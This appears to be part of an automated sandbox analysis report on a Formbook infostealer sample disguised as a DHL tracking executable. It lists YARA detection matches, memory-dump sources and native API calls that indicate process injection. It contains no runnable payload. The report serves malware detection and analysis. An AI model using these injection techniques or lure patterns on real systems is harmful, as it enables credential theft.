          Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL AWB TRACKING DETAILS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403225
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_0040604C0_2_0040604C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_004047720_2_00404772
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_023809FB0_2_023809FB
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041E0721_2_0041E072
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041E8191_2_0041E819
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D9E61_2_0041D9E6
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041EB611_2_0041EB61
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041DB8A1_2_0041DB8A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D5A31_2_0041D5A3
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D5A61_2_0041D5A6
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041E5BD1_2_0041E5BD
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00409E5C1_2_00409E5C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00409E601_2_00409E60
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A320A01_2_00A320A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD20A81_2_00AD20A8
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1B0901_2_00A1B090
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD28EC1_2_00AD28EC
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ADE8241_2_00ADE824
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC10021_2_00AC1002
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A241201_2_00A24120
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0F9001_2_00A0F900
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD22AE1_2_00AD22AE
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3EBB01_2_00A3EBB0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACDBD21_2_00ACDBD2
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD2B281_2_00AD2B28
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1841F1_2_00A1841F
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACD4661_2_00ACD466
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A325811_2_00A32581
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1D5E01_2_00A1D5E0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD25DD1_2_00AD25DD
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A00D201_2_00A00D20
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD2D071_2_00AD2D07
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD1D551_2_00AD1D55
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD2EF71_2_00AD2EF7
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A26E301_2_00A26E30
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACD6161_2_00ACD616
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD1FF11_2_00AD1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F2B2811_2_033F2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335EBB011_2_0335EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F1FF111_2_033F1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EDBD211_2_033EDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03346E3011_2_03346E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F22AE11_2_033F22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F2EF711_2_033F2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03320D2011_2_03320D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334412011_2_03344120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332F90011_2_0332F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F2D0711_2_033F2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F1D5511_2_033F1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335258111_2_03352581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333D5E011_2_0333D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F25DD11_2_033F25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333841F11_2_0333841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E100211_2_033E1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033520A011_2_033520A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F20A811_2_033F20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333B09011_2_0333B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1E81911_2_00A1E819
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1E07211_2_00A1E072
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D9E611_2_00A1D9E6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1EB6111_2_00A1EB61
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D5A311_2_00A1D5A3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D5A611_2_00A1D5A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1E5BD11_2_00A1E5BD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A02D8711_2_00A02D87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A02D9011_2_00A02D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A09E6011_2_00A09E60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A09E5C11_2_00A09E5C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A02FB011_2_00A02FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0332B150 appears 35 times
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: String function: 00A0B150 appears 35 times
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A360 NtCreateFile,1_2_0041A360
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A410 NtReadFile,1_2_0041A410
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A490 NtClose,1_2_0041A490
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A540 NtAllocateVirtualMemory,1_2_0041A540
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A35B NtCreateFile,1_2_0041A35B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A40A NtReadFile,1_2_0041A40A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A53A NtAllocateVirtualMemory,1_2_0041A53A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A498F0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A49860
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk,1_2_00A49840
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk,1_2_00A499A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A49910
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk,1_2_00A49A20
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A49A00
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk,1_2_00A49A50
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A495D0 NtClose,LdrInitializeThunk,1_2_00A495D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49540 NtReadFile,LdrInitializeThunk,1_2_00A49540
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A496E0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A49660
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A497A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A49780
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A49710
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A498A0 NtWriteVirtualMemory,1_2_00A498A0
